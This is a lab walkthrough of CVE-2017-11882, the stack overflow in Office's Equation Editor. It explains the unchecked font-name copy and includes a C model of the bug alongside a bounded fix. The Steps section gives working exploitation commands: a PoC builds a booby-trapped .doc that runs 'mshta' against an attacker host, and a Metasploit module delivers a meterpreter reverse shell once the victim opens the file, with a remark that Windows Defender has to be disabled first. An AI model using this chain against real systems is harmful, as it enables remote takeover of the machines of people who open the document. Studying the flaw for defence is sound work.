CVE-2017-11882

Introduction

CVE-2017-11882 is a remote code execution vulnerability disclosed by Microsoft that affects every Office version on the market at the time (Office 2007 through Office 2016) on whichever Windows version it runs on. The root cause is in the EQNEDT32.EXE process (Equation Editor): when it reads OLE data containing an Equation Editor 3.0 (MathType) object, it copies the equation's font name into a fixed-size stack buffer without checking the name's length, giving a textbook stack buffer overflow. EQNEDT32.EXE was compiled in 2000 without ASLR and runs as its own process, so a hard-coded return address works on every affected install and the bug is exploited without any information leak. The last Office stack overflow this typical was the well-known CVE-2012-0158.
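The copy described above, modelled in C as an added example (this is not the Equation Editor's code and not code from this page): a small parser for a FONT-style record (tag byte, typeface byte, style byte, NUL-terminated name) with the unchecked copy next to a bounded replacement that fails closed. The record layout, the 36-byte buffer size and the sample names are assumptions made for this example; the malicious record is constructed inline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the Equation Editor FONT record: tag byte 0x08, typeface byte,
 * style byte, then a NUL-terminated font name. The buffer size below is an
 * assumption made for this example, not a value taken from the binary. */
#define MTEF_FONT_TAG 0x08
#define FONT_NAME_BUF 36

/* Vulnerable pattern: copy until NUL with no bound. Never run this on
 * attacker-controlled input; it is here only to show the shape of the bug. */
static void copy_font_name_unchecked(char *dst, const uint8_t *src)
{
    while ((*dst++ = (char)*src++) != '\0')
        ;
}

/* Hardened replacement: refuse to write past dst instead of truncating.
 * Returns the name length, -1 if no terminator lies inside the record,
 * -2 if the name plus its NUL does not fit in dst. */
static int copy_font_name_checked(char *dst, size_t dstsz,
                                  const uint8_t *src, size_t avail)
{
    size_t n = 0;
    while (n < avail && src[n] != '\0')
        n++;
    if (n >= avail)
        return -1;
    if (n + 1 > dstsz)
        return -2;
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Serialize a FONT record into out; returns bytes written, 0 on failure. */
static size_t build_font_record(uint8_t *out, size_t outsz, const char *name)
{
    size_t n = strlen(name);
    if (n + 4 > outsz)
        return 0;
    out[0] = MTEF_FONT_TAG;
    out[1] = 0x01; /* typeface number, arbitrary for this example */
    out[2] = 0x00; /* style */
    memcpy(out + 3, name, n + 1);
    return n + 4;
}

/* How many bytes the unchecked copy would write past a FONT_NAME_BUF-byte
 * buffer for this record: 0 means it fits, -1 means malformed record.
 * The copy itself is never performed here. */
static long font_record_overrun(const uint8_t *rec, size_t len)
{
    if (len < 3 || rec[0] != MTEF_FONT_TAG)
        return -1;
    size_t avail = len - 3, n = 0;
    while (n < avail && rec[3 + n] != '\0')
        n++;
    if (n >= avail)
        return -1;
    long spill = (long)(n + 1) - FONT_NAME_BUF;
    return spill > 0 ? spill : 0;
}

/* Wrappers that build a record from a name and run the two checks. */
static long name_overrun(const char *name)
{
    uint8_t rec[256];
    size_t len = build_font_record(rec, sizeof rec, name);
    return len ? font_record_overrun(rec, len) : -1;
}

static int name_fits(const char *name)
{
    uint8_t rec[256];
    char dst[FONT_NAME_BUF];
    size_t len = build_font_record(rec, sizeof rec, name);
    return len ? copy_font_name_checked(dst, sizeof dst, rec + 3, len - 3) : -1;
}

/* Constructed sample: a 44-byte name, longer than the buffer but short enough
 * to sit in one record, modelled on the oversized names such exploits carry. */
static const char *malicious_name(void)
{
    static char buf[45];
    memset(buf, 'A', 44);
    buf[44] = '\0';
    return buf;
}

int main(void)
{
    char dst[FONT_NAME_BUF];
    uint8_t rec[64];
    size_t len = build_font_record(rec, sizeof rec, "Times New Roman");
    if (!len)
        return 1;
    copy_font_name_unchecked(dst, rec + 3); /* safe only because this name fits */
    printf("benign: '%s' overrun=%ld checked=%d\n", dst,
           name_overrun("Times New Roman"), name_fits("Times New Roman"));
    printf("malicious: overrun=%ld checked=%d\n",
           name_overrun(malicious_name()), name_fits(malicious_name()));
    return 0;
}
```

The point of `font_record_overrun` is that the spill size is decided entirely by data in the document; nothing about the process state matters, which is why a single crafted record works identically on every affected install.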

  • Tool: Kali Rolling x64
  • Target Machine: Windows 7 Ultimate x64
  • Target Software: Microsoft Office 2010 Professional Plus

Steps

  1. Bash

    unzip CVE-2017-11882.zip
    # -c is the command the document runs, -o the output file name
    # keep -c short: the command sits in the overflowed font-name field and the public PoC gives it only about 43 bytes
    python CVE-2017-11882/cve-2017-11882.py -c "cmd.exe /c calc.exe" -o "calc.doc"   # local test
    python CVE-2017-11882/cve-2017-11882.py -c "mshta http://10.20.20.5:8080/path" -o "classTable.doc"
    cp CVE-2017-11882/cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
    cp CVE-2017-11882/cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    msfconsole
    
  2. msfconsole

    reload_all
    search CVE-2017-11882
    use exploit/windows/smb/cve_2017_11882
    set payload windows/meterpreter/reverse_tcp
    set lhost 10.20.20.5
    set uripath path
    run # exploit
    # wait for the target to open the 'classTable.doc' document; mshta then fetches the HTA from http://10.20.20.5:8080/path and the meterpreter session comes back
    # on Windows 7, either opening or editing 'calc.doc' launches calc.exe
    # on Windows 10, only editing 'calc.doc' launched calc.exe in this test
    # note: on Windows 10, Windows Defender must be disabled first, otherwise it blocks the payload
    